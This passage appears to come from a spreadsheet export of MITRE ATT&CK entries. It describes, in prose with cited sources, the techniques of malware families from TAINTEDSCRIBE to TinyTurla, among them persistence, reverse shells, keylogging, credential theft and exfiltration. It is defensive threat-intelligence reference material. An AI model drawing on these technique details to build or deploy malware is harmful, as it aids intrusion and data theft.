    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) has used FakeTLS for session authentication.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can copy itself into the current user’s Startup folder as “Narrator.exe” for persistence.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>The [TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) command and execution module can perform target system enumeration.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) uses a Linear Feedback Shift Register (LFSR) algorithm for network encryption.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can use &lt;code&gt;DriveList&lt;/code&gt; to retrieve drive information.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can execute &lt;code&gt;GetLocalTime&lt;/code&gt; for time discovery.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can change the timestamp of specified filenames.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can enable Windows CLI access and execute files.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TDTESS](https://attack.mitre.org/software/S0164) creates then deletes log files during installation of itself as a service.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>[TDTESS](https://attack.mitre.org/software/S0164) has a command to download and execute an additional file.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>After creating a new service for persistence, [TDTESS](https://attack.mitre.org/software/S0164) sets the file creation time for the service to the creation time of the victim's legitimate svchost.exe file.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>[TDTESS](https://attack.mitre.org/software/S0164) provides a reverse shell on the victim.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>If running as administrator, [TDTESS](https://attack.mitre.org/software/S0164) installs itself as a new service named bmwappushservice to establish persistence.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) was decoded using a custom rolling XOR algorithm to execute a customized [Cobalt Strike](https://attack.mitre.org/software/S0154) payload.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Check Point Sunburst Teardrop December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) files had names that resembled legitimate Window file and directory names.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) modified the Registry to create a Windows service for itself on a compromised host.(Citation: Check Point Sunburst Teardrop December 2020)</t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) created and read from a file with a fake JPG header, and its payload was encrypted with a simple rotating XOR cipher.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Check Point Sunburst Teardrop December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[TEARDROP](https://attack.mitre.org/software/S0560) checked that &lt;code&gt;HKU\SOFTWARE\Microsoft\CTF&lt;/code&gt; existed before decoding its embedded payload.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021) </t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) ran as a Windows service from the &lt;code&gt;c:\windows\syswow64&lt;/code&gt; folder.(Citation: Check Point Sunburst Teardrop December 2020)(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[TEXTMATE](https://attack.mitre.org/software/S0146) uses DNS TXT records for C2.(Citation: FireEye FIN7 March 2017)</t>
  </si>
  <si>
    <t>[TEXTMATE](https://attack.mitre.org/software/S0146) executes cmd.exe to provide a reverse shell to adversaries.(Citation: FireEye FIN7 March 2017)(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>When a document is found matching one of the extensions in the configuration, [TINYTYPHON](https://attack.mitre.org/software/S0131) uploads it to the C2 server.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[TINYTYPHON](https://attack.mitre.org/software/S0131) searches through the drive containing the OS, then all drive letters C through to Z, for documents matching certain extensions.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[TINYTYPHON](https://attack.mitre.org/software/S0131) has used XOR with 0x90 to obfuscate its configuration file.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[TINYTYPHON](https://attack.mitre.org/software/S0131) installs itself under Registry Run key to establish persistence.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to steal saved passwords from the Internet Explorer, Edge, Firefox, and Chrome browsers.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to decrypt, load, and execute a DLL and its resources.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to discover drive information on the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to upload and download files to and from the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has been executed via malicious links embedded in e-mails spoofing the Ministries of Education, Culture, Sports, Science and Technology of Japan.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) can use ICMP to receive information on the destination server.(Citation: JPCert BlackTech Malware September 2019)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to list processes on the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to inject code into the svchost.exe, iexplorer.exe, explorer.exe, and default browser processes.(Citation: JPCert BlackTech Malware September 2019)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to proxy communications with command and control (C2) servers.(Citation: JPCert BlackTech Malware September 2019)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has encrypted network communications with RC4.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to identify the IP of the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) can multiple protocols including HTTP and HTTPS in communication with command and control (C2) servers.(Citation: JPCert BlackTech Malware September 2019)(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to execute shell commands on the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of injecting code into the APC queue of a created [Rundll32](https://attack.mitre.org/techniques/T1218/011) process as part of an "Early Bird injection."(Citation: CyberBit Early Bird Apr 2018)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of downloading additional files.(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of writing to a Registry Run key to establish.(Citation: CyberBit Early Bird Apr 2018)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of taking screenshots.(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of gathering system information.(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of creating a reverse shell.(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>One [TYPEFRAME](https://attack.mitre.org/software/S0263) variant decrypts an archive using an RC4 key, then decompresses and installs the decrypted malicious DLL module. Another variant decodes the embedded file by XORing it with the value "0x35".(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can open the Windows Firewall on the victim’s machine to allow incoming connections.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can delete files off the system.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can search directories for files on the victim’s machine.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can upload and download files to the victim’s machine.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>A Word document delivering [TYPEFRAME](https://attack.mitre.org/software/S0263) prompts the user to enable macro execution.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can install encrypted configuration data under the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\laxhost.dll&lt;/code&gt; and &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs&lt;/code&gt;.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) has used ports 443, 8080, and 8443 with a FakeTLS method.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>APIs and strings in some [TYPEFRAME](https://attack.mitre.org/software/S0263) variants are RC4 encrypted. Another variant is encoded with XOR.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>A [TYPEFRAME](https://attack.mitre.org/software/S0263) variant can force the compromised system to function as a proxy server.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can gather the disk volume information.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) has used a malicious Word document for delivery with VBA macros for execution.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can uninstall malware components using a batch script.(Citation: US-CERT TYPEFRAME June 2018) [TYPEFRAME](https://attack.mitre.org/software/S0263) can execute commands using a shell.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) variants can add malicious DLL modules as new services.[TYPEFRAME](https://attack.mitre.org/software/S0263) can also delete services from the victim’s machine.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can upload data and files from a victim's machine.(Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can use a stream cipher to decrypt stings used by the malware.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can perform DLL loading.(Citation: TrendMicro Taidoor)(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can use &lt;code&gt;DeleteFileA&lt;/code&gt; to remove files from infected hosts.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can search for specific files.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) has downloaded additional files onto a compromised host.(Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) has relied upon a victim to click on a malicious email attachment.(Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) has the ability to modify the Registry on compromised hosts using &lt;code&gt;RegDeleteValueA&lt;/code&gt; and &lt;code&gt;RegCreateKeyExA&lt;/code&gt;.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) has the ability to use native APIs for execution including &lt;code&gt;GetProcessHeap&lt;/code&gt;, &lt;code&gt;GetProcAddress&lt;/code&gt;, and &lt;code&gt;LoadLibrary&lt;/code&gt;.(Citation: TrendMicro Taidoor)(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can use TCP for C2 communications.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can use encrypted string blocks for obfuscation.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can use &lt;code&gt;GetCurrentProcessId&lt;/code&gt; for process discovery.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can query the Registry on compromised hosts using &lt;code&gt;RegQueryValueExA&lt;/code&gt;.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) has modified the &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; key for persistence.(Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) has been delivered through spearphishing emails.(Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) uses RC4 to encrypt the message body of HTTP content.(Citation: TrendMicro Taidoor)(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) has collected the MAC address of a compromised host; it can also use &lt;code&gt;GetAdaptersInfo&lt;/code&gt; to identify network adapters.(Citation: TrendMicro Taidoor)(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can use &lt;code&gt;GetLocalTime&lt;/code&gt; and &lt;code&gt;GetSystemTime&lt;/code&gt; to collect system time.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) has used HTTP GET and POST requests for C2.(Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can copy cmd.exe into the system temp folder.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to use the open source libraries XZip/Xunzip and zlib to compress files.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture VoiceIP application audio on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to index and compress files into a send queue for exfiltration.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to manage an automated queue of egress files and commands sent to its C2.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal data from the clipboard of an infected host.(Citation: Kaspersky TajMahal April 2019)
</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal documents from the local system including the print spooler queue.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal written CD images and files of interest from previously connected removable drives when they become available again.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to inject DLLs for malicious plugins into running processes.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to send collected files over its C2.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to index files from drives, user profiles, and removable drives.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture keystrokes on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) can set the &lt;code&gt;KeepPrintedJobs&lt;/code&gt; attribute for configured printers in &lt;code&gt;SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers&lt;/code&gt; to enable document stealing.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has used an encrypted Virtual File System to store plugins.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify connected Apple devices.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify running processes and associated plugins on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to take screenshots on an infected host including capturing content from windows of instant messaging applications.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify which anti-virus products, firewalls, and anti-spyware products are in use.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to inject the &lt;code&gt;LoadLibrary&lt;/code&gt; call template DLL into running processes.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify the Internet Explorer (IE) version on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal web session cookies from Internet Explorer, Netscape Navigator, FireFox and RealNetworks applications.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify hardware information, the computer name, and OS information on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify the MAC address on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to determine local time on a compromised host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture webcam video.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[Tarrask](https://attack.mitre.org/software/S1011) is able to create “hidden” scheduled tasks by deleting the Security Descriptor (`SD`) registry value.(Citation: Tarrask scheduled task)</t>
  </si>
  <si>
    <t>[Tarrask](https://attack.mitre.org/software/S1011) creates a scheduled task called “WinUpdate” to re-establish any dropped  C2 connections.(Citation: Tarrask scheduled task)</t>
  </si>
  <si>
    <t xml:space="preserve">[Tarrask](https://attack.mitre.org/software/S1011) has masqueraded as executable files such as `winupdate.exe`, `date.exe`, or `win.exe`.(Citation: Tarrask scheduled task)   </t>
  </si>
  <si>
    <t>[Tarrask](https://attack.mitre.org/software/S1011) is able to delete the Security Descriptor (`SD`) registry subkey in order to “hide” scheduled tasks.(Citation: Tarrask scheduled task)</t>
  </si>
  <si>
    <t>[Tarrask](https://attack.mitre.org/software/S1011) is able to create “hidden” scheduled tasks for persistence.(Citation: Tarrask scheduled task)</t>
  </si>
  <si>
    <t xml:space="preserve">[Tarrask](https://attack.mitre.org/software/S1011) leverages token theft to obtain `lsass.exe` security permissions.(Citation: Tarrask scheduled task) </t>
  </si>
  <si>
    <t>[Tarrask](https://attack.mitre.org/software/S1011) may abuse the Windows schtasks command-line tool to create "hidden" scheduled tasks.(Citation: Tarrask scheduled task)</t>
  </si>
  <si>
    <t>[Tasklist](https://attack.mitre.org/software/S0057) can be used to discover processes running on a system.(Citation: Microsoft Tasklist)</t>
  </si>
  <si>
    <t>[Tasklist](https://attack.mitre.org/software/S0057) can be used to enumerate security software currently running on a system by process name of known products.(Citation: Microsoft Tasklist)</t>
  </si>
  <si>
    <t>[Tasklist](https://attack.mitre.org/software/S0057) can be used to discover services running on a system.(Citation: Microsoft Tasklist)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses [AppleScript](https://attack.mitre.org/techniques/T1059/002)'s &lt;code&gt;osascript -e&lt;/code&gt; command to launch [ThiefQuest](https://attack.mitre.org/software/S0595)'s persistence via [Launch Agent](https://attack.mitre.org/techniques/T1543/001) and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004). (Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) searches through the &lt;code&gt;/Users/&lt;/code&gt; folder looking for executable files. For each executable, [ThiefQuest](https://attack.mitre.org/software/S0595) prepends a copy of itself to the beginning of the file. When the file is executed, the [ThiefQuest](https://attack.mitre.org/software/S0595) code is executed first. [ThiefQuest](https://attack.mitre.org/software/S0595) creates a hidden file, copies the original target executable to the file, then executes the new hidden file to maintain the appearance of normal behavior. (Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) encrypts a set of file extensions on a host, deletes the original files, and provides a ransom note with no contact information.(Citation: wardle evilquest partii)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses a function named &lt;code&gt;is_debugging&lt;/code&gt; to perform anti-debugging logic. The function invokes &lt;code&gt;sysctl&lt;/code&gt; checking the returned value of &lt;code&gt;P_TRACED&lt;/code&gt;. [ThiefQuest](https://attack.mitre.org/software/S0595) also calls &lt;code&gt;ptrace&lt;/code&gt; with the &lt;code&gt;PTRACE_DENY_ATTACH&lt;/code&gt; flag to prevent debugging.(Citation: wardle evilquest partii)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses the function &lt;code&gt;kill_unwanted&lt;/code&gt; to obtain a list of running processes and kills each process matching a list of security related processes.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) exfiltrates targeted file extensions in the &lt;code&gt;/Users/&lt;/code&gt; folder to the command and control server via unencrypted HTTP. Network packets contain a string with two pieces of information: a file path and the contents of the file in a base64 encoded string.(Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) hides a copy of itself in the user's &lt;code&gt;~/Library&lt;/code&gt; directory by using a &lt;code&gt;.&lt;/code&gt; at the beginning of the file name followed by 9 random characters.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) can download and execute payloads in-memory or from disk.(Citation: wardle evilquest partii)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses the &lt;code&gt;CGEventTap&lt;/code&gt; functions to perform keylogging.(Citation: Trendmicro Evolving ThiefQuest 2020)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) installs a launch item using an embedded encrypted launch agent property list template. The plist file is installed in the &lt;code&gt;~/Library/LaunchAgents/&lt;/code&gt; folder and configured with the path to the persistent binary located in the &lt;code&gt;~/Library/&lt;/code&gt; folder.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>When running with root privileges after a [Launch Agent](https://attack.mitre.org/techniques/T1543/001) is installed, [ThiefQuest](https://attack.mitre.org/software/S0595) installs a plist file to the &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt; folder with the &lt;code&gt;RunAtLoad&lt;/code&gt; key set to &lt;code&gt;true&lt;/code&gt; establishing persistence as a Launch Daemon. (Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) prepends a copy of itself to the beginning of an executable file while maintaining the name of the executable.(Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses various API to perform behaviors such as executing payloads and performing local enumeration.(Citation: wardle evilquest partii)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) obtains a list of running processes using the function &lt;code&gt;kill_unwanted&lt;/code&gt;.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses various API functions such as &lt;code&gt;NSCreateObjectFileImageFromMemory&lt;/code&gt; to load and link in-memory payloads.(Citation: wardle evilquest partii)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses the &lt;code&gt;kill_unwanted&lt;/code&gt; function to get a list of running processes, compares each process with an encrypted list of “unwanted” security related programs, and kills the processes for security related programs.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) invokes &lt;code&gt;time&lt;/code&gt; call to check the system's time, executes a &lt;code&gt;sleep&lt;/code&gt; command, invokes a second &lt;code&gt;time&lt;/code&gt; call, and then compares the time difference between the two &lt;code&gt;time&lt;/code&gt; calls and the amount of time the system slept to identify the sandbox.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uploads files via unencrypted HTTP. (Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) can collect data and files from a compromised host.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) can decrypt its payload using RC4, AES, or one-byte XORing.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) can obtain file and directory information.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) can download additional tools to enable lateral movement.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) relies on a victim to click on a malicious document for initial execution.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) chooses its payload creation path from a randomly selected service name from netsvc.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) can save its configuration data as the following RC4-encrypted Registry key: `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameCon`.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) has been compressed and obfuscated using RC4, AES, or XOR.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) can be loaded into the Startup folder (`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\OneDrives.lnk`) as a Shortcut file for persistence.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[ThreatNeedle](https://attack.mitre.org/software/S0665) has been distributed via a malicious Word document within a spearphishing email.(Citation: Kaspersky ThreatNeedle Feb 2021) </t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) can collect system profile information from a compromised host.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) can run in memory and register its payload as a Windows service.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) has the ability to encrypt C2 traffic with SSL/TLS.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
